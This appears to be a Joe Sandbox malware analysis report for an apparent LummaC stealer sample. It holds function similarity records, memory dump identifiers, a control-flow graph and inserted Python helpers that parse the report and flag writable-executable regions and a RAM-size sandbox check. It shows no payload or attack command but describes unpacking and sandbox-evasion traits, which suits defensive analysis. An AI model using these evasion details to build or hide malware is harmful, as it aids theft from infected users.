                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                  • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
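The records above are the per-function "Similarity" entries that the Joe Sandbox IDA plugin emits for each function in the dumped image. As an added example (not part of the Joe Sandbox report or its tooling), the Python below parses records in that rendered layout, checks that each "API String ID" pair agrees with its "API ID" and "String ID" fields (the convention that a 0 half means an empty field is inferred from the records on this page, not documented here), and flags calls to APIs on a small watchlist so the analyst can jump straight to the anti-analysis functions. The watchlist and its reasons are this example's own assumptions: GetPhysicallyInstalledSystemMemory is on it because a RAM-size check is a common sandbox-detection heuristic, not because the report labels that call as such. The sample input is constructed from three records copied from this page, with the Associated dump lines and most hash fields left out.

```python
"""Parse Joe Sandbox 'Similarity' function records from the rendered report.

Added example; not Joe Sandbox code.  Layout (bullet-free section headers,
'• Key: Value' fields) follows the rendered report text on this page.
"""
import re
from collections import defaultdict

# '• Func.Module(args), ref: addr' lines under the 'APIs' header
API_CALL_RE = re.compile(
    r"^• (?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# '• Key: Value' lines (value may be empty, e.g. '• API ID:')
FIELD_RE = re.compile(r"^• (?P<key>[^:]+):\s*(?P<value>.*)$")

# Assumed watchlist: this example's own annotations, not labels from the report.
SUSPECT_APIS = {
    "GetPhysicallyInstalledSystemMemory": "RAM-size check; sandboxes often run with little memory",
}

# Constructed sample: three records copied from this report page (abbreviated).
SAMPLE = """\
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 009CD3EE
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: ><+
• API String ID: 3960555810-2918635699
• Instruction Fuzzy Hash: 18C10575A057818FD725CF29C490722FBE2BF96310F1885ADD4DA8B752C735E802CB51
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
Similarity
• API ID:
• String ID: A8DE765A6B6DDD2BBEBA0C6A975F1733
• API String ID: 0-1420259744
• Instruction Fuzzy Hash: CD8129756407418BD3258B38CC927A7B7E2EFDB315F1DC96CD4869B347E638A80287A0
APIs
• LdrInitializeThunk.NTDLL(009E148A,00FFC960,00000018,?,?,00000018,?,?,?), ref: 009DE13E
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
"""


def _new_record():
    return {"apis": [], "fields": {}}


def parse_records(text):
    """Split the rendered text into records; each ends at 'Instruction Fuzzy Hash'."""
    records, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line  # 'APIs', 'Strings', 'Memory Dump Source', 'Similarity', ...
            continue
        if section == "APIs":
            m = API_CALL_RE.match(line)
            if m:
                rec["apis"].append(m.groupdict())
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        rec["fields"][key] = value
        if key == "Instruction Fuzzy Hash":  # last field of every record on the page
            records.append(rec)
            rec = _new_record()
    return records


def split_api_string_id(rec):
    """'3960555810-2918635699' -> (api_hash, string_hash) as ints."""
    api_hash, str_hash = rec["fields"]["API String ID"].split("-")
    return int(api_hash), int(str_hash)


def check_api_string_id(rec):
    """A zero half of 'API String ID' must coincide with an empty 'API ID' /
    'String ID' field (convention inferred from the records on this page)."""
    api_hash, str_hash = split_api_string_id(rec)
    f = rec["fields"]
    return ((api_hash == 0) == (f.get("API ID", "") == "")
            and (str_hash == 0) == (f.get("String ID", "") == ""))


def flag_suspect_apis(records, watchlist=SUSPECT_APIS):
    """Return every watchlisted API call with its module, call site and record hash."""
    hits = []
    for rec in records:
        for call in rec["apis"]:
            if call["func"] in watchlist:
                hits.append({"func": call["func"], "module": call["module"],
                             "ref": call["ref"], "reason": watchlist[call["func"]],
                             "instruction_hash": rec["fields"]["Instruction Fuzzy Hash"]})
    return hits


def index_by_api_id(records):
    """Map each 'API ID' (possibly empty) to the instruction hashes that carry it."""
    by_api = defaultdict(list)
    for rec in records:
        by_api[rec["fields"].get("API ID", "")].append(rec["fields"]["Instruction Fuzzy Hash"])
    return dict(by_api)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(f"{len(recs)} records; API String ID consistent: {all(map(check_api_string_id, recs))}")
    for h in flag_suspect_apis(recs):
        print(f"{h['module']}!{h['func']} @ {h['ref']}: {h['reason']}")
```

Feed the full report text (with the "Associated" lines and the leading whitespace left in; the parser ignores both) to `parse_records` and the `index_by_api_id` map gives a quick view of how many functions share an API ID, while `flag_suspect_apis` lists the call sites to open in IDA first.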
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: _^]\
                                                                                                                                                                                                                                  • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                  • Opcode ID: 4f2c22448e43a4f4645eecc54d82e869a55541c4f19df47f8c0237bed7e61a7e
                                                                                                                                                                                                                                  • Instruction ID: 69160e6e004ac5e26bf0c50ca8242206d336fe8acbf406c41ca9cc1887f19b3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f2c22448e43a4f4645eecc54d82e869a55541c4f19df47f8c0237bed7e61a7e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB711AB1E0C3405BD7189BA8DCD2F3BF6A5DF92318F18852CE48687292E274DC059B57
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: InitializeThunk
• String ID: =<32
• API String ID: 2994545307-852023076
• Opcode ID: 5ad85ffe69dc911149ad5fc47b5fca308b75c4df54e11fa4bafbb04afc21d185
• Instruction ID: c504700f0f203dac35832189dff0bd8da7bedb9244ef472081d1c96a76a00ffa
• Opcode Fuzzy Hash: 5ad85ffe69dc911149ad5fc47b5fca308b75c4df54e11fa4bafbb04afc21d185
• Instruction Fuzzy Hash: B5316838708384ABE715DA15DCD1B3FB7AAEB85B50F18852CE6859B2E0D771EC409782
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID:
• String ID: ,-
• API String ID: 0-1027024164
• Opcode ID: fe069f8a3572e12b6ffb5c331fbb710b5f723a92edceea24c42271f54ad4e638
• Instruction ID: ec24b8861e110c69bd41c097948218220412c199b1bedb7477b281106c7113b3
• Opcode Fuzzy Hash: fe069f8a3572e12b6ffb5c331fbb710b5f723a92edceea24c42271f54ad4e638
• Instruction Fuzzy Hash: 9021F4A19153008BC7149F29C852A27B6B5EF87361B45861CE4868B352F734CD05C797
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
• Opcode ID: fbc66ce1d7e71c2cc0d39d5b9c09d2867f3328b49fceec2e3e4a4d39b1d4b903
• Instruction ID: 0dcdd4592935a43e4ef9546b6bae027f63a64287bfa7956a1ff8a55d11d15652
• Opcode Fuzzy Hash: fbc66ce1d7e71c2cc0d39d5b9c09d2867f3328b49fceec2e3e4a4d39b1d4b903
• Instruction Fuzzy Hash: D031FF716083448BC314DF58D8C266FBBE8EBC5324F14992CE698872E0E375DC88CB92
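The dump identifiers above carry the base address and the page protection of each region the sandbox dumped. Nine of the associated regions were dumped as PAGE_EXECUTE_READWRITE (0x40) and two as PAGE_EXECUTE_WRITECOPY (0x80), which is what the "Detected unpacking (changes PE section rights)" signature in this report is keyed on. The following is an added example, not part of the Joe Sandbox report or its tooling; it parses the identifier lines as they appear on this page and lists the regions that were both writable and executable. The field layout of the identifier (process index, round, dump id, base address, protection, an opaque field, region type, an opaque field) is an assumption inferred from the values; the PAGE_* and MEM_* constants are the documented winnt.h values.

```python
"""Decode Joe Sandbox .sdmp memory-dump identifiers from a report and flag
regions that were writable and executable when they were dumped."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Page protection values from winnt.h (MEMORY_BASIC_INFORMATION.Protect).
PAGE_PROTECTIONS: Dict[int, str] = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE = 0x04 | 0x08 | 0x40 | 0x80
# Region type values from winnt.h (MEMORY_BASIC_INFORMATION.Type).
MEM_TYPES: Dict[int, str] = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED",
                             0x1000000: "MEM_IMAGE"}

# ASSUMPTION: identifier field order. Only base, protection (values match
# PAGE_* exactly) and type (0x01000000 == MEM_IMAGE) are interpreted; the
# remaining fields are captured but treated as opaque.
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<round>[0-9A-F]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\.(?P<opaque1>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<opaque2>[0-9A-F]{8})\.sdmp",
    re.IGNORECASE,
)


@dataclass
class SdmpRegion:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def writable_and_executable(self) -> bool:
        return bool(self.protect & EXECUTABLE) and bool(self.protect & WRITABLE)


def parse_sdmp(line: str) -> Optional[SdmpRegion]:
    """Parse one report line ('• Associated: <id>.sdmpDownload File' or
    'Source File: <id>.sdmp, Offset: ...'); None if it holds no identifier."""
    m = SDMP_RE.search(line)
    if not m:
        return None
    return SdmpRegion(name=m.group(0), base=int(m.group("base"), 16),
                      protect=int(m.group("prot"), 16),
                      mem_type=int(m.group("mtype"), 16))


def wx_regions(lines: List[str]) -> List[SdmpRegion]:
    """Unique regions (by identifier) that were writable and executable, by base."""
    seen: Dict[str, SdmpRegion] = {}
    for line in lines:
        r = parse_sdmp(line)
        if r is not None and r.name not in seen:
            seen[r.name] = r
    return sorted((r for r in seen.values() if r.writable_and_executable),
                  key=lambda r: r.base)


# Constructed sample: the identifier lines of this report block, as extracted.
SAMPLE_LINES = [
    "• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true",
    "• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File",
    "• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File",
]

if __name__ == "__main__":
    for r in wx_regions(SAMPLE_LINES):
        print(f"{r.base:#010x} {r.protect_name:<24} {r.type_name}")
```

Regions that are MEM_IMAGE yet PAGE_EXECUTE_READWRITE are the ones worth pulling first: a normally mapped PE keeps its code sections PAGE_EXECUTE_READ, so an image section that is writable and executable at dump time is where an unpacker has rewritten itself, and the dump at that base (here the 009A1000 source dump) is the candidate for the unpacked LummaC payload.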
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 83474f0055fe98345cdd26948a451936ca3dc5c38663c57db026bd2d2702e08e
                                                                                                                                                                                                                                  • Instruction ID: a73e1481c255ac14932bbebed25cb9231ce9ae7effd1bc5917bbfdf683505639
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83474f0055fe98345cdd26948a451936ca3dc5c38663c57db026bd2d2702e08e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F16158356083819BDB169F19C89073FB7A2EBC5710F19C52CE9858B2A5EB70DC91D782
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d0c27a6593663a438e1d8933fee476e90164603700ada52510fc637783ae40de
• Instruction ID: f18e05638619775481a96184f43c983afe0959816a73ea6a2fc65e8ace068aa7
• Opcode Fuzzy Hash: d0c27a6593663a438e1d8933fee476e90164603700ada52510fc637783ae40de
• Instruction Fuzzy Hash: B7516BB5A4C3064BD728AF68C88072FB7D6ABD5710F19C97EE4C59B391E631AC01CB85
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID:
• API String ID: 237503144-0
• Opcode ID: a1fd382298c2d28afd3e6b6da77137aa01fb463ccc8922aa748db7dddc2ac714
• Instruction ID: fb83f73996f08a5144083ced08fb1ee64d995cc1369ced644fe3b505be7673b4
• Opcode Fuzzy Hash: a1fd382298c2d28afd3e6b6da77137aa01fb463ccc8922aa748db7dddc2ac714
• Instruction Fuzzy Hash: BD3107E9F002441BE60576212C63F7F61675BD2718F08502CF40B2A383ED69F95696E7

Control-flow Graph
(Rendered in the original report as a graph with executed and not-executed blocks colour-coded; the colouring is not recoverable from the extracted text. Basic blocks and edges as recorded, with the API called in a block in parentheses:)
• 9cd7ee-9cd7f3 -> 9cd7f5-9cd7f9, 9cd813-9cd819
• 9cd7f5-9cd7f9 -> 9cd800-9cd809
• 9cd800-9cd809 -> 9cd800-9cd809 (self-loop), 9cd80b-9cd80e
• 9cd80b-9cd80e -> 9cd896-9cdbfb
• 9cd813-9cd819 -> 9cd896-9cdbfb
• 9cd896-9cdbfb (FreeLibrary; call 9dfe00) -> 9cdc00-9cdc12
• 9cdc00-9cdc12 -> 9cdc00-9cdc12 (self-loop), 9cdc14-9cdc19
• 9cdc14-9cdc19 -> 9cdc2d, 9cdc1b-9cdc1f
• 9cdc1b-9cdc1f -> 9cdc20-9cdc29
• 9cdc20-9cdc29 -> 9cdc20-9cdc29 (self-loop), 9cdc2b
• 9cdc2b -> 9cdc30-9cdc72
• 9cdc2d -> 9cdc30-9cdc72
• 9cdc30-9cdc72 (GetComputerNameExA)
APIs
• FreeLibrary.KERNEL32(?), ref: 009CD898
• GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009CDC43 (NameType 6 is ComputerNamePhysicalDnsDomain in the Windows COMPUTER_NAME_FORMAT enum, i.e. the host's physical DNS domain name)
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: ComputerFreeLibraryName
• String ID: ;87>
• API String ID: 2904949787-2104535307
• Opcode ID: b5b1d09afb76eea154d2ad20467f7006ff793990be5c92aec61c658cf5829699
